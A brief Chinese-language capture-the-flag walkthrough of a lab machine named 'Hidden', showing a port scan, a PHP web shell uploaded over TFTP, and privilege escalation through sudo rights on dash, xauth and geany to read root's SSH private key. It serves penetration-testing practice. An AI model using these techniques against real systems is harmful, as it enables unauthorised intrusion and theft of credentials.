# 靶场练习
下载:Hidden
Nat,IP: 192.168.1.143
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) |
再扫一下 UDP 端口发现开了 tftp
┌──(root㉿kali)-[~] | |
└─# tftp 192.168.1.143 69 | |
tftp> put shell.php |
访问一下拿到 shell
# 提权
sudo -l
发现有个 dash 可以使用
www-data@hidden:/$ sudo -u satan /usr/bin/dash | |
sudo: unable to resolve host hidden: Name or service not known | |
$ id | |
uid=1000(satan) gid=1000(satan) groups=1000(satan) |
拿到了 satan 的 shell
写入一个 ssh 公钥,这样可以 ssh 连上去
kali 默认 /etc/ssh/sshd_config
中 X11Forwarding yes
,如果不是要调成 yes,不然没有办法启用这个 x11
使用 ssh -X -i id_rsa [email protected]
看一下 sudo -l 发现两个,一个是 xauth,另一个是 genay
先用 xauth 生成一个会话吧?应该可以这么称呼: sudo xauth
然后 xauth list
查看会话的信息
再然后添加到 root 权限中: sudo xauth add hidden/unix:10 MIT-MAGIC-COOKIE-1 e64dd93e3c2e7f2c4cb9ebbad32d8091
最后 sudo geany /root/.ssh/id_rsa
拿到 root 的私钥
连上去,拿到 root 权限
# 小结
X11Forwarding yes
是 SSH 服务器的配置选项之一。当设置为 yes
时,它允许通过 SSH 连接在远程机器上显示图形界面应用程序。这意味着你可以在远程服务器上运行图形应用程序,并将它们的窗口显示在本地计算机上。
这项配置对于需要在远程服务器上运行图形应用程序并在本地显示的情况非常有用,比如远程桌面、图形化的配置工具等。